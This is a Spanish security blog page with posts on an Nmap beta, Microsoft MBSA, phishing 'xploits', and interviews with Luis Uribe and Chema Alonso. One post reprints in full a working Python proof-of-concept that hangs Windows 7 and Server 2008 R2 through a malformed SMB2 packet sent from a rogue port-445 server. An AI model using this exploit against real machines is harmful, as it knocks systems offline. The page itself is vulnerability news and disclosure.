Rincón Informático

Esta entrada es para todas aquellas personas “gomosas” de las nuevas versiones y que además saben de qué se trata NMAP.

En Rincon Informático hemos hablado un poco sobre esta herramienta de la que cualquier persona interesada en Seguridad informática debiera conocer.

Esta nueva versión (que se encuentra en pruebas) trae consigo (como bien acostumbrados nos tiene la gente de Insecure.ORG) novedades muy interesantes como por ejemplo un Script que chequea si la “victima” soporte SMBv2 para poder explotar cierto problema que tienen algunos Sistemas Operativos.

En total son más de 14 nuevos Scripts (NSE), descubrimiento efectivo sobre puertos UDP y más de 100 cambios entre los que se encuentras los de desempeño y los errores de programación corregidos.

Dejo los respectivos enlaces de descarga, documentación y demás.

Nmap 5.10 Beta 1 Released

Documentación

Descarga

Etiquetas: 2009, cambios, descarga, descargar, DoS, error, herramienta, ion, ip, mac, mbr, nmap, nmap 5, problema, programa, puerto, puertos, script, scripts, seguridad, Seguridad Informatica, sistema, version, VI, vista, vulnerabilidad, Windows, xp

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008

Etiquetas: 2009, blog, bug, codigo, DoS, encuentro, exploit, hackear, ion, ip, kernel, NST, problema, reiniciar, rne, script, seguridad, sistema, VI, vista, vulnerabilidad, Windows, windows 7, windows vista, xp

Leyendo algunos tweets me encuentro en este sitio, un vídeo muy interesante el cual nos muestra una computación, entre Microsoft y  GNU/Linux  la competencia tiene 2 bandos por cada lado, en el lado del mal participan Windows Vista, y el recién salido del Horno  Windows 7, mientras que por GNU/Linux participan Ubuntu 9.04 y el nuevo consentido Ubuntu 9.10

La idea del reto es bastante sencillo, el primero sistema operativo en arrancar… ¿Quien ganara? Hagan sus apuestas!!!!

Etiquetas: 2009, access, arranque, blog, boot, CD, DoS, download, encuentro, GNU, GNU/Linux, GNU/Linux, IDE, ion, ip, mac, mal, Microsoft, reto, script, sencillo, sistema, Ubuntu, ubuntu 9.04, Ubuntu 9.10, version, VI, vista, Windows, windows 7, windows vista

Microsoft en su intento por dominar el mundo intenta hacer software para todas las necesidades de los informáticos.  En esta ocasión presentan una actualización de su aplicación de administración de vulnerabilidades Microsoft Baseline Security Analyzer (MBSA).

Puede ser que no sea la mejor (de hecho no lo es) pero para las personas que quieren empezar a conocer de que se trata las vulnerabilidades o que desean hacer un muy rápido vistazo de su red esta herramienta puede que le ayude a examinar de manera superficial y así hacerse a una idea de la seguridad en su entorno.

Es una herramienta gratis que incluye interface tanto grafica como de línea de comandos (poco a poco Microsoft entiende de esta necesidad).  MBSA no está en nuestro idioma, pero realmente no es un inconveniente pues que como siempre es muy intuitivo, hecho a prueba de…

Tiene cosas malas como que necesita conectarse a internet para descargar las “recomendaciones” de Microsoft, solo funciona obviamente para “escanear” maquinas que ejecuten sistemas operativos de Microsoft.

NOTA: MBSA NO es una herramienta profesional y probablemente NUNCA lo sea.  Sin embargo para las personas que DESEAN EMPEZAR pueden hacerlo con este software.

FAQ de MBSA.

Página de descarga.

Etiquetas: comando, descarga, descargar, DoS, download, gratis, herramienta, IDE, Internet, ion, LAN, mal, MBSA, Microsoft, red, rne, seguridad, sistema, Software, VI, vista, vulnerabilidad, Windows

Mucha gente tiende a confundir los términos exploits y xploits o  creen que significan lo mismo, sin embargo,   aunque se escriban casi de la misma forma tienen grandes diferencias de carácter conceptual. En esta oportunidad quiero explicarles desde mi punto de vista: que es un Exploit y un Xploit, para que podamos ver claramente las diferencias que hay entre ellos y de esta forma no volver a confundirlos.

¿Que es Xploit?

Un Xploit son  las conocidas  y famosas postales de gusanito falsas, que su función es  crear una pagina idéntica a la de hotmail,gmail, yahoo, facebook, etc,  para que los usuarios  digiten allí su password. El procedimiento es sencillo. A la víctima le llega un correo diciendo que alguna persona (puede ser conocida o no) le mando una tarjeta postal, la víctima  por curiosidad abre el correo y este dice que para abrir la postal debe dar click en un enlace, sin embargo este enlace es falso y lo que hace es abrir el formulario idéntico de hotmail (o de otro servicio de correo)  creado por el atacante. Estando allí, la víctima simplemente cree que se le cerro hotmail y vuelve a escribir la contraseña sin saber que ese formulario es falso.

¿Que es Exploit ?

Un Exploit es un programa que logra explotar  un bug o fallo de algún programa o hardware, causando que este funcione de tal forma que no fue pensado en un comienzo,  Dichos programas son hechos generalmente en C, perl, python, ruby, php y su función generalmente es violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.

Espero que haya quedado un poco mas claro las diferencias que hay entre,  un termino y el otro,  y  si alguien no esta de acuerdo con lo expuesto, con gusto lo invito a que me  diga desde su punto de vista  cual es la diferencia entre estos dos términos.

Etiquetas: abrir, ataque, bug, click, contraseña, correo, crear, diferencias, DoS, exploit, facebook, gmail, gusanito, hacking, hacking hotmail, ion, password, php, programa, python, seguridad, sencillo, usuario, usuarios, VI, vista, VUE, xp, xploit

Siguiendo con la iniciativa de entrevistar a  varios de los ponentes del tercer Encuentro Internacional de Seguridad Informatica (EISI 3), llego el turno de Luis Uribe,mas conocido como Acme un Linuxero, defensor del Software Libre y aspirante a desarrollador del proyecto Debian, esperamos que les guste la entrevista y que conozcan un poco mas de esta gran persona:

RI:¿Por qué Acme?

Acme: El nick viene de los tiempos de irc por alla en el 98, y se quedó en algunos servicios de correo. No recuerdo porque lo escogí, pero si se que es más complicado cambiar el nick que escoger uno nuevo.

Acme:Si te refieres a mis estudios, son varios e incompletos: Yo quiero terminar la carrera pero en la universidad no me han dejado salir. El resto ha sido iniciativa propia: muchos libros de programación, listas de correo, blogs, amigos geeks, etc.

Hay dos cosas que mi experiencia me ha enseñado:

- Un título universitario no es garantía de que sepas.

- En la mayoría de empresas o paises, un título universitario así sea de la universidad de la esquina, es muy útil para acceder a becas, cursos, viajes permisos de trabajo y mejores ofertas.

Entonces: hay que graduarse e investigar mucho por fuera.

RI: ¿Por qué software libre?

Acme: Al principio fué por razones técnicas, una plataforma como MS Windows no me permitía hacer lo que yo quería, es muy limitada y restrictiva con el usuario.

Pero después de conocer la filosofía del Software Libre, me di cuenta que estaba de acuerdo con ella (y la venia practicando hace un tiempo), así que fue el complemento ideal.

Obviamente uso software libre o privativo cuando es necesario, pero prefiero no pasarme al lado oscuro de la fuerza.

Acme: Si avanza pero muy poco, creo que necesitamos más lideres y menos personas esperando a colaborar. La mejor forma de colaborar es liderando un proyecto
Un actor importante en paises como Ecuador y Venezuela, ha sido el gobierno, independendientemente de colores y banderas, no se puede negar que políticas estatales le dan un empujon al uso de Software Libre.

Debian. Una configuración normal permite trabajar a un usuario de internet, oficina y juegos. La he probado en casa y entornos de oficina y no me presenta problemas, el usuario perezoso es el que le encuentra problemas a la distribución, y eso va a pasar siempre aunque uses Ubuntu, Debian o cualquier Windows.

Otro tema es que si tratas al usuario como idiota, siempre lo va a ser.

Acme: Quisiera verlo más reconocido por los usuarios, que comprendan el tema de las libertades y porque no le deberíamos entregar nuestros datos a una empresa.

Acme: Un par de tatuajes, más compromiso con el proyecto Debian, un par de viajes, muchas cervezas, pero no se en que orden. Hay muchas ideas pero ninguna con fecha definida. Por lo pronto estoy dedicado con alma, vida y sombrero a mi trabajo actual en Sisfo.

RI: ¿MySql o Postgres?

Acme: Los dos, casi siempre el problema no es del motor de la base de datos sino de un mal diseño de tablas, pocos recursos de máquina y consultas mal realizadas.

GNU/Linux, Debian específicamente. No he probado Open Solaris aún.

Acme: Club Colombia . Aunque prefiero el Jack Daniels y/o Smirnoff.

Muchas gracias a Luis por haber contestado muy amablemente las preguntas,  para los que desean mas informacion pueden visitar la pagina personal de acme, haciendo click aqui

Etiquetas: acme, amigos, blog, click, colombia, configuración, correo, curso, datos, debian, DoS, eisi, eisi 3, encuentro, Entrevista, estudiar, geek, GNU, GNU/Linux, GNU/Linux, IDE, informacion, informatica, Internet, ion, ip, irc, Juegos, libre, libro, listas, luis uribe, mac, mal, mbr, ms, mysql, nick, pontente, problema, programa, rne, seguridad, Seguridad Informatica, servicios, Software, software libre, solaris, sql, tablas, Ubuntu, usuario, usuarios, VI, vista, Windows, xp

Chema Alonso es un maligno, en todo el sentido de la palabra, es un informático maligno, pero no malo (eso es diferente) es tan maligno que acepto una pequeña entrevista que le hemos hecho por correo electrónico, sin mucho mas que aportar, los dejamos con las 9 preguntas y sus respectivas respuestas al mejor estilo del Chema, JODER!!.

Rincón Informático (Rinf):¿Cómo comenzaste en el mundo de la Seguridad Informática?

Chema Alonso (CA):La verdad es que fue casi por casualidad, o tal vez el destino me lo tenía guardado. Profesionalmente, antes me había dedicado a otros menesteres como son las bases de datos con mi querido y odiado a la vez Oracle, la programación, las redes o el diseño gráfico. Un día se hizo famoso un wargame en España que había ganado un tal mandingo y en el que había quedado segundo un tal RoMaNSoFt. Empecé a enredar con las primeras fases una vez terminado el reto, descubrí el SQL Injection y… joder, yo sabía mucho de lenguaje SQL y era muy sencillo si manejas bien las bases de datos. Empecé a leer los papers de Chris Anley, Litchfiled, y… la siguiente oportunidad que me surgió de hacer algo profesionalmente dedicado a seguridad informática no lo desaproveché. Desde entonces vivimos felices y comimos perdices.

Rinf:Pregunta obligada: ¿Por qué Windows y no Mac o GNU/Linux?

CA:Windows satisface todas mis necesidades como usuario. En mi día a día es la opción con la que me siento más cómodo, la que mejor conozco y la que me permite trabajar más rápido. Si tengo que usar un Linux para alguna cosa puntual lo uso. Con Mac es otra historia, ya que aun no hemos sido presentados formalmente, pero he de reconocer, y esto es una opinión personal, que no me gustan demasiado los colores de los interfaces en COCOA a primera vista

Rinf:¿Cuál es el gadget más extraño que tienes y el que más deseas?

CA:No soy muy de gadgets, no tengo muchos. Todos los años acumulo montones de gadgets que me regalan en conferencias, eventos, promociones, etc… y cuando llegan las navidades me encargo de hacer un “Papa Noel” con todos ellos. Un reloj que proyecta la hora en el techo, lámparas de portátiles, tazas que se calientan por USB, etc… Hoy en día no uso ninguno porque se me ha roto mi lamparita de lectura nocturna para libros. No, no se engancha por USB, simplemente se engancha al libro y crea una luz de lectura muy cómoda.

Rinf:¿El maligno tiene maligno-novia? (Cuidado con las fans)

CA:¿Fama? ¿Éxito? ¿SEXO?  No es lo que busca un Jedi

Rinf:¿Sobre qué temas prefieres escribir en el Lado Del Mal?

CA:El lado del mal empezó siendo un blog con un toque de mala uva para tocar los cojones a mucho subnormal. Poco a poco tenía que ir argumentando algunos posts con comentarios técnicos, luego empecé a dejar publicados los artículos de revistas que iba publicando, mis dibujitos, mis idas de olla y hoy en día escribo básicamente sobre lo que vivo y lo que trabajamos en I64.

Rinf:¿Oracle o MsSQL?

CA:Hoy en día MsSQL, pero reconozco que amé y odié a esa base de datos que versión a versión cambiaba de lugar y formato todos los archivos de configuración. Siempre me ha maravillado como Oracle nos maltrataba cambiando todas las opciones de configuración de versión a versión. “Hijo de una hiena!”. Pero luego me encantaba cuando podía desmotar toda una base de datos en un Solaris y montarlo en un Windows tocando cuatro cosas. O cuando configurabas el rman a saco y bases de datos en Stand By… Pero hoy en día me quedo con el Enterprise Manager de SQL Server y su claridad.

Rinf:Tres páginas obligadas de lecturas para Chema.

CA:Tres páginas no es muy difícil. La primera la de mi amigo Alejandro Ramos y sus compañeros en SecuriyByDefault, la segunda no es un página pero como si lo fuera: la newsletter de Una-al-día en la que leo el verbo fluido y afinado de “pajarraco” de los Santos o las artísticas reflexiones de Bernardo Quintero, MVP de Seguridad en Microsoft. La tercera página es la de WindowsTecnico en la que, a pesar de escribir yo alguna cosa o pedir que se toque un tema u otro, me sorprende ver lo que escriben mis compañeros del SOCtano.

Rinf:¿Alguna vez has ganado un Wargame? si es afirmativo, cuál y cuál fue el premio?

CA:Nooooo, y me gustaría, pero no tengo paciencia. Tanto es así, que no puedo acabar los partidos de futbol cuando están muy tensos. Me pueden los nervios y tengo que cambiar de canal. Con los wargames soy muy luser, se me da mejor crearlos que ganarlos.

Rinf:¿Cómo te imaginas al  maligno 20 años después?

CA:

Opción a) El Maligno es un tipo mayor, calvo, que se dedica a contar batallitas por las universidades. Ha escrito un libro sobre anécdotas en los eventos y vive entre charla y charla cuidando gatos.

Opción B) El Maligno ha visto la luz, se ha pasado a Linux y es un activo activista del software libre que se dedica a evangelizar el mundo entero desde su cabaña en África. Es un talibán y vive montando flames en foros.

Opción C) El Maligno ha cogido su maleta y se ha ido a vivir a Buenos Aires, desde allí se dedica a dibujar un tira de comics cutres sobre No Lusers en los que sin gracia, ni humor, ni estilo pinta aventuras sobre informáticos de segunda. Por las tardes toca la guitarra en un club de segunda con cuatro colegas porque por fin ha aprendido a tocar.

Opción D) El Maligno no ha cambiado, sigue siendo un crápula mezquino y golfo que gasta su vida entre conferencia y conferencia de seguridad informática y trabaja como profesor en una universidad o un instituto como profesor.

Informática 64 es una gran empresa en todos los casos y es dirigida por gente más hábil que yo. Como el futuro no está escrito… cualquiera puede ser verdad.

No queda más que agradecer a Chema la molestia que le pudo causar responder estar preguntas, espero disfruten esta entrevista y aprendamos cada vez mas sobre el maligno.

Saludos Malignos!!!

El Lado del Mal

Security by Default

Windows técnico

Etiquetas: archivo, archivos, bases de datos, blog, CD, chema, chema alonso, conferencia, conferencias, configuración, correo, crear, cuidado, datos, DoS, eisi 3, Entrevista, evento, futuro, GNU, GNU/Linux, GNU/Linux, ion, ip, LAN, libre, libro, mac, mal, Microsoft, montar, ms, navidad, NST, ORACLE, PC, programa, red, Redes, reto, salud, SAP, seguridad, sencillo, Software, software libre, solaris, sql, Tip, usb, usuario, VI, vim, vista, Windows, xp